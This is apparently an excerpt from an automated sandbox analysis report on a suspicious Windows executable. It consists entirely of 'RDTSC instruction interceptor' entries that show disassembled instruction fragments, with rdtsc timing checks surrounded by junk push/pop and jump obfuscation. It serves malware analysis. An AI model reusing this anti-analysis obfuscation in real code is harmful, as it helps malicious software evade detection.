                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58B99 second address: C58B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58B9F second address: C58BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58BA3 second address: C58BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58BA7 second address: C58BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b push eax 0x0000000c jl 00007F0DD08F41B6h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007F0DD08F41CDh 0x00000020 jmp 00007F0DD08F41C7h 0x00000025 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58BDE second address: C58BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58BE4 second address: C58BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58FAF second address: C58FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007F0DD1497E6Fh 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop eax 0x0000000e lea ebx, dword ptr [ebp+1244D95Dh] 0x00000014 mov esi, 7C7CD20Ah 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F0DD1497E6Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C58FE6 second address: C58FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C7A2CD second address: C7A2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0DD1497E66h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007F0DD1497E66h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C429CC second address: C429E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 jmp 00007F0DD08F41C1h 0x0000000c pop ebx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C7811E second address: C78130 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DD1497E6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C783D6 second address: C783E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jnl 00007F0DD08F41B6h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C7899C second address: C789BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F0DD1497E66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jbe 00007F0DD1497E6Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F0DD1497E66h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C789BE second address: C789C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C78B1C second address: C78B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C78E1C second address: C78E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C79293 second address: C79298 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C79298 second address: C792BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD08F41C4h 0x00000009 pop ebx 0x0000000a jc 00007F0DD08F41C2h 0x00000010 jns 00007F0DD08F41B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C792BF second address: C792CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C792CB second address: C792CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C792CF second address: C792EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0DD1497E73h 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C79E99 second address: C79EA3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0DD08F41B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C79EA3 second address: C79EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F0DD1497E66h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0DD1497E71h 0x00000014 popad 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80313 second address: C80317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80317 second address: C8031C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80460 second address: C80464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80464 second address: C8046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8046A second address: C804B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0DD08F41B6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F0DD08F41C5h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F0DD08F41C1h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0DD08F41BEh 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C804B5 second address: C804BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C7F322 second address: C7F32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F0DD08F41B6h 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80600 second address: C80612 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0DD1497E68h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80612 second address: C80616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80616 second address: C8064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f jmp 00007F0DD1497E79h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8064F second address: C80653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80653 second address: C80659 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C80659 second address: C80669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DD08F41BBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C83F6D second address: C83F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F0DD1497E6Bh 0x0000000f pop esi 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C46018 second address: C4602E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F0DD08F41B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jng 00007F0DD08F41B6h 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4602E second address: C46065 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DD1497E66h 0x00000008 jno 00007F0DD1497E66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F0DD1497E6Ah 0x00000019 jns 00007F0DD1497E66h 0x0000001f popad 0x00000020 jmp 00007F0DD1497E72h 0x00000025 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C46065 second address: C4606B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4606B second address: C4606F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C86DA7 second address: C86DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jno 00007F0DD08F41B6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C87547 second address: C8755D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0DD1497E66h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C876BA second address: C876BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C87F78 second address: C87F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C880CA second address: C880CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C88402 second address: C8840B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8840B second address: C88411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C88509 second address: C8850F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8850F second address: C88513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8ACC3 second address: C8ACC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8BFFA second address: C8BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8D1B1 second address: C8D1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8BFFE second address: C8C002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8D3DA second address: C8D3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8D1B7 second address: C8D1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8C002 second address: C8C01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0DD1497E6Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8F3E7 second address: C8F3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8F3EB second address: C8F408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E79h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8FD5C second address: C8FD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8FD63 second address: C8FDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3BC8h] 0x00000010 push 00000000h 0x00000012 add si, 53E0h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F0DD1497E68h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov esi, dword ptr [ebp+122D3B80h] 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8FDA5 second address: C8FDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C98C11 second address: C98C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C98C1E second address: C98C24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9679C second address: C967A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C967A0 second address: C967AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C967AD second address: C967B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9AD64 second address: C9AD7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41C2h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9AD7A second address: C9AD7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C99F83 second address: C99F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9AF13 second address: C9AF17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9CD75 second address: C9CD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9CD79 second address: C9CD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9CD89 second address: C9CDB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0DD08F41BEh 0x00000012 js 00007F0DD08F41B6h 0x00000018 popad 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9CDB4 second address: C9CDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9DE73 second address: C9DE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F0DD08F41BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9DE85 second address: C9DE89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9DE89 second address: C9DEDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3365h], eax 0x00000010 push 00000000h 0x00000012 sbb ebx, 78AFA723h 0x00000018 clc 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F0DD08F41B8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 ja 00007F0DD08F41B6h 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 popad 0x00000042 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9EEDF second address: C9EF80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F0DD1497E76h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 movzx edi, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F0DD1497E68h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D397Ch] 0x00000038 jg 00007F0DD1497E66h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F0DD1497E68h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a jmp 00007F0DD1497E75h 0x0000005f mov bl, 91h 0x00000061 add bl, FFFFFFD1h 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9F112 second address: C9F1AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F0DD08F41CDh 0x0000000d jmp 00007F0DD08F41C7h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F0DD08F41B8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D3A1Ch] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F0DD08F41B8h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D3584h], ecx 0x0000005a mov dword ptr fs:[00000000h], esp 0x00000061 mov ebx, dword ptr [ebp+122D3A50h] 0x00000067 sub edi, 4870100Eh 0x0000006d mov eax, dword ptr [ebp+122D00B5h] 0x00000073 push FFFFFFFFh 0x00000075 mov bx, 9D34h 0x00000079 nop 0x0000007a push ebx 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA0F3E second address: CA0F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9F1AC second address: C9F1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C9F1B0 second address: C9F1C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F0DD1497E68h 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F0DD1497E66h 0x00000017 rdtsc
